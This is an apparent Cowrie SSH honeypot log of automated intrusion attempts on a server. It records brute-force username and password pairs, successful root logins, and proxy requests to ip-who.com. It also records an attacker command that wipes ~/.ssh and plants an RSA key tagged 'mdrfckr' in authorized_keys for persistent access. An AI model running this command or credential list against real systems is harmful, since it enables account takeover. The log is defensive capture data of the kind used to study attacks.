{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:02:32.159326Z","src_ip":"199.195.253.95","session":"b1ddc367f6c6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:02:32.160145Z","src_ip":"199.195.253.95","session":"b1ddc367f6c6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:02:32.291591Z","src_ip":"199.195.253.95","session":"b1ddc367f6c6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:02:32.723314Z","src_ip":"199.195.253.95","session":"b1ddc367f6c6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T18:02:32.724009Z","src_ip":"199.195.253.95","session":"b1ddc367f6c6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T18:02:32.915325Z","src_ip":"199.195.253.95","session":"b1ddc367f6c6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:02:32.916459Z","src_ip":"199.195.253.95","session":"b1ddc367f6c6"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":33556,"dst_ip":"1.2.3.4","dst_port":22,"session":"dee4f5245bea","protocol":"ssh","message":"New connection: 199.195.253.95:33556 (1.2.3.4:22) [session: dee4f5245bea]","sensor":"my-vps","timestamp":"2025-08-28T18:02:33.081950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:02:33.086692Z","src_ip":"199.195.253.95","session":"dee4f5245bea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:02:33.278580Z","src_ip":"199.195.253.95","session":"dee4f5245bea"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T18:02:34.054646Z","src_ip":"199.195.253.95","session":"dee4f5245bea"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:02:35.199280Z","src_ip":"199.195.253.95","session":"dee4f5245bea"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":34490,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d9adff4b6bc","protocol":"ssh","message":"New connection: 199.195.253.95:34490 (1.2.3.4:22) [session: 7d9adff4b6bc]","sensor":"my-vps","timestamp":"2025-08-28T18:02:35.331013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:02:35.341138Z","src_ip":"199.195.253.95","session":"7d9adff4b6bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:02:35.470612Z","src_ip":"199.195.253.95","session":"7d9adff4b6bc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:02:36.030367Z","src_ip":"199.195.253.95","session":"7d9adff4b6bc"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:02:36.140325Z","src_ip":"199.195.253.95","session":"b1ddc367f6c6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:02:36.141664Z","src_ip":"199.195.253.95","session":"7d9adff4b6bc"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":40170,"dst_ip":"1.2.3.4","dst_port":22,"session":"50f0964b78db","protocol":"ssh","message":"New connection: 171.243.150.185:40170 (1.2.3.4:22) [session: 50f0964b78db]","sensor":"my-vps","timestamp":"2025-08-28T18:02:56.772939Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:02:56.827489Z","src_ip":"171.243.150.185","session":"50f0964b78db"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:02:56.975400Z","src_ip":"171.243.150.185","session":"50f0964b78db"}
{"eventid":"cowrie.login.success","username":"root","password":"ipscan","message":"login attempt [root/ipscan] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:03:02.622051Z","src_ip":"171.243.150.185","session":"50f0964b78db"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"171.243.150.185","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T18:03:02.833839Z","session":"50f0964b78db"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T18:03:03.978873Z","src_ip":"171.243.150.185","session":"50f0964b78db"}
{"eventid":"cowrie.session.closed","duration":"14.8","message":"Connection lost after 14.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:03:11.547296Z","src_ip":"171.243.150.185","session":"50f0964b78db"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.220","src_port":37162,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d15e9d1edc2","protocol":"ssh","message":"New connection: 171.243.150.220:37162 (1.2.3.4:22) [session: 4d15e9d1edc2]","sensor":"my-vps","timestamp":"2025-08-28T18:03:14.891565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:03:14.892616Z","src_ip":"171.243.150.220","session":"4d15e9d1edc2"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:03:15.117478Z","src_ip":"171.243.150.220","session":"4d15e9d1edc2"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd1234","message":"login attempt [root/abcd1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:03:18.398893Z","src_ip":"171.243.150.220","session":"4d15e9d1edc2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"171.243.150.220","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T18:03:18.638404Z","session":"4d15e9d1edc2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T18:03:18.889968Z","src_ip":"171.243.150.220","session":"4d15e9d1edc2"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:03:19.194475Z","src_ip":"171.243.150.220","session":"4d15e9d1edc2"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":55438,"dst_ip":"1.2.3.4","dst_port":22,"session":"67a1aa6c5c12","protocol":"ssh","message":"New connection: 80.94.95.15:55438 (1.2.3.4:22) [session: 67a1aa6c5c12]","sensor":"my-vps","timestamp":"2025-08-28T18:03:26.742555Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T18:03:26.744053Z","src_ip":"80.94.95.15","session":"67a1aa6c5c12"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T18:03:26.836756Z","src_ip":"80.94.95.15","session":"67a1aa6c5c12"}
{"eventid":"cowrie.login.failed","username":"user","password":"mature","message":"login attempt [user/mature] failed","sensor":"my-vps","timestamp":"2025-08-28T18:03:27.428692Z","src_ip":"80.94.95.15","session":"67a1aa6c5c12"}
{"eventid":"cowrie.login.failed","username":"user","password":"ivanov","message":"login attempt [user/ivanov] failed","sensor":"my-vps","timestamp":"2025-08-28T18:03:28.818944Z","src_ip":"80.94.95.15","session":"67a1aa6c5c12"}
{"eventid":"cowrie.login.failed","username":"user","password":"husker","message":"login attempt [user/husker] failed","sensor":"my-vps","timestamp":"2025-08-28T18:03:29.898014Z","src_ip":"80.94.95.15","session":"67a1aa6c5c12"}
{"eventid":"cowrie.login.failed","username":"user","password":"homerun","message":"login attempt [user/homerun] failed","sensor":"my-vps","timestamp":"2025-08-28T18:03:30.969557Z","src_ip":"80.94.95.15","session":"67a1aa6c5c12"}
{"eventid":"cowrie.login.failed","username":"user","password":"esther","message":"login attempt [user/esther] failed","sensor":"my-vps","timestamp":"2025-08-28T18:03:32.067316Z","src_ip":"80.94.95.15","session":"67a1aa6c5c12"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:03:33.171259Z","src_ip":"80.94.95.15","session":"67a1aa6c5c12"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":57914,"dst_ip":"1.2.3.4","dst_port":22,"session":"37b02e55ca52","protocol":"ssh","message":"New connection: 199.195.253.95:57914 (1.2.3.4:22) [session: 37b02e55ca52]","sensor":"my-vps","timestamp":"2025-08-28T18:03:37.768728Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:03:37.774210Z","src_ip":"199.195.253.95","session":"37b02e55ca52"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:03:37.903343Z","src_ip":"199.195.253.95","session":"37b02e55ca52"}
{"eventid":"cowrie.login.success","username":"root","password":"Gf123456","message":"login attempt [root/Gf123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:03:38.522410Z","src_ip":"199.195.253.95","session":"37b02e55ca52"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:03:38.909122Z","src_ip":"199.195.253.95","session":"37b02e55ca52"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:03:38.909876Z","src_ip":"199.195.253.95","session":"37b02e55ca52"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:03:38.910995Z","src_ip":"199.195.253.95","session":"37b02e55ca52"}
{"eventid":"cowrie.login.success","username":"root","password":"ipscan","message":"login attempt [root/ipscan] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:03:39.039842Z","src_ip":"212.227.125.160","session":"d16f35778b7b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:03:39.095452Z","src_ip":"199.195.253.95","session":"37b02e55ca52"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:03:39.967595Z","src_ip":"199.195.253.95","session":"37b02e55ca52"}
